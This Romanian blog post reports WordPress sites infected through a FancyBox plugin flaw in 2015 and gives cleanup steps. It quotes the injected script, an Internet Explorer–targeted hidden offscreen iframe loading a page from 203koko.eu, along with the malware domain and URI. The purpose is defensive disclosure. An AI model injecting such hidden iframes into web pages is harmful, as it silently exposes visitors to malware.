[Malware iframe 203koko] Website-uri WordPress Infectate Malware

La inceputul saptamanii o serie de site-uri si bloguri cu WordPress, au primit  avertismente de infectare cu malware prin intermediul Google Webmasters.

Problema la care Google Webmasters face referire este prezenta unui cod / script iframe malware in sursa paginilor web.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”http://203koko.eu/hjnfh/ipframe2.php” width=”20″ height=”30″ ></iframe></div>’); }</script>

Se pare ca este vorba de o vulnerabilitate a plugin-ului FancyBox for WordPress care pana ieri (05.02.2015) nu mai fusese actualizat de mult timp.
Rezolvarea acestei probleme si dezinfectarea site-urilor virusate cu acest malware, este relativ simpla.
1. Dezactivati plugn-ul FancyBox.
2. Stergeti toate fisierele plugin-ului FancyBox de pe server (via FTP)
3. Instalati noua versiune a plugin-ului (FancyBox 3.0.4)

FancyBox for WordPress 3.0.4

– Renamed the setting affected by the security issue mentioned in 3.0.3. This should stop the malicious code from appearing on sites where the plugin is updated without removing the malicious code.

FancyBox for WordPress 3.0.3

– Fixed a security issue.

Malware Info: 

TYPE: Iframe redirection
TARGET: WordPress Fancybox
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” width=”20″ height=”30″ ></iframe>
MALWARE SCRIPT: <script>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”>

Remove malware from your WordPress website.

[Malware iframe 203koko] Website-uri WordPress Infectate Malware

About the author

Stealth L.P.

Fondator si editor Stealth Settings, din 2006 pana in prezent.
Experienta pe sistemele de operare Linux (in special CentOS), Mac OS X , Windows XP > Windows 10 si WordPress (CMS).

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.